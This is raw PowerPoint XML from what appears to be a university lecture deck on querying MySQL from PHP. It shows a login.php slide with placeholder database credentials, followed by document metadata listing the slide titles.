            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>&lt;?php // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>  $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>hn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t> = 'localhost';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>     // domain name or IP of SQL server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>  $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t> = 'publications';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  // name of the database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>  $un = 'username';	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>// replace with actual username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>  $pw = 'password';	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>// replace with actual password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-PK" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/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896A6-A878-478E-8D7F-EE062EC68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66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11166</TotalTime>
  <Words>4674</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>524</Paragraphs>
  <Slides>50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6" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Gotham Narrow Book</vt:lpstr>
      <vt:lpstr>Gotham Narrow Medium</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Web Systems &amp; Technologies</vt:lpstr>
      <vt:lpstr>Summary of Database Terms</vt:lpstr>
      <vt:lpstr>MySQL Commands</vt:lpstr>
      <vt:lpstr>MySQL Commands</vt:lpstr>
      <vt:lpstr>MySQL Commands</vt:lpstr>
      <vt:lpstr>Querying a MySQL Database</vt:lpstr>
      <vt:lpstr>Querying a MySQL Database</vt:lpstr>
      <vt:lpstr>Querying a MySQL Database with PHP</vt:lpstr>
      <vt:lpstr>Creating a Login File</vt:lpstr>
      <vt:lpstr>Connecting to a MySQL Database</vt:lpstr>
      <vt:lpstr>Connecting to a MySQL Database</vt:lpstr>
      <vt:lpstr>Building and executing a query</vt:lpstr>
      <vt:lpstr>Building and executing a query</vt:lpstr>
      <vt:lpstr>Fetching a result</vt:lpstr>
      <vt:lpstr>Example 10-4. Fetching results one cell at a time</vt:lpstr>
      <vt:lpstr>Example 10-4. Fetching results one cell at a time</vt:lpstr>
      <vt:lpstr>Example 10-4. Fetching results one cell at a time</vt:lpstr>
      <vt:lpstr>Figure 10-1. The output from the query-mysqli.php program in Example 10-4</vt:lpstr>
      <vt:lpstr>Fetching a row</vt:lpstr>
      <vt:lpstr>Example 10-5. Fetching results one row at a time</vt:lpstr>
      <vt:lpstr>Example 10-5. Fetching results one row at a time</vt:lpstr>
      <vt:lpstr>Closing a connection</vt:lpstr>
      <vt:lpstr>A Practical Example</vt:lpstr>
      <vt:lpstr>The $_POST Array</vt:lpstr>
      <vt:lpstr>Querying the Database</vt:lpstr>
      <vt:lpstr>Deleting and Inserting a Record</vt:lpstr>
      <vt:lpstr>Displaying the Form</vt:lpstr>
      <vt:lpstr>Example 10-6. Inserting and deleting using sqltest.php</vt:lpstr>
      <vt:lpstr>Example 10-6. Inserting and deleting using sqltest.php</vt:lpstr>
      <vt:lpstr>Example 10-6. Inserting and deleting using sqltest.php</vt:lpstr>
      <vt:lpstr>Example 10-6. Inserting and deleting using sqltest.php</vt:lpstr>
      <vt:lpstr>Example 10-6. Inserting and deleting using sqltest.php</vt:lpstr>
      <vt:lpstr>Example 10-6. Inserting and deleting using sqltest.php</vt:lpstr>
      <vt:lpstr>Figure 10-2. The output from Example 10-6</vt:lpstr>
      <vt:lpstr>Creating a Table</vt:lpstr>
      <vt:lpstr>Describing a Table</vt:lpstr>
      <vt:lpstr>Describing a Table</vt:lpstr>
      <vt:lpstr>Dropping a Table</vt:lpstr>
      <vt:lpstr>Adding Data</vt:lpstr>
      <vt:lpstr>Retrieving Data</vt:lpstr>
      <vt:lpstr>Retrieving Data</vt:lpstr>
      <vt:lpstr>Updating Data</vt:lpstr>
      <vt:lpstr>Deleting Data</vt:lpstr>
      <vt:lpstr>Using AUTO_INCREMENT</vt:lpstr>
      <vt:lpstr>Using AUTO_INCREMENT</vt:lpstr>
      <vt:lpstr>Performing Additional Queries</vt:lpstr>
      <vt:lpstr>Performing Additional Queries</vt:lpstr>
      <vt:lpstr>Preventing Hacking Attempts</vt:lpstr>
      <vt:lpstr>Preventing Hacking Attempts</vt:lpstr>
      <vt:lpstr>Preventing Hacking Attempts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MySQL</dc:title>
  <dc:subject>Web Systems and Technologies</dc:subject>
  <dc:creator>Muhammad Fahad</dc:creator>
  <cp:lastModifiedBy>Muhammad Fahad</cp:lastModifiedBy>
  <cp:revision>951</cp:revision>
  <cp:lastPrinted>2018-02-20T01:02:10Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-11-25T11:53:26Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-19T10:49:03Z</dcterms:modified>
</cp:coreProperties>
</file>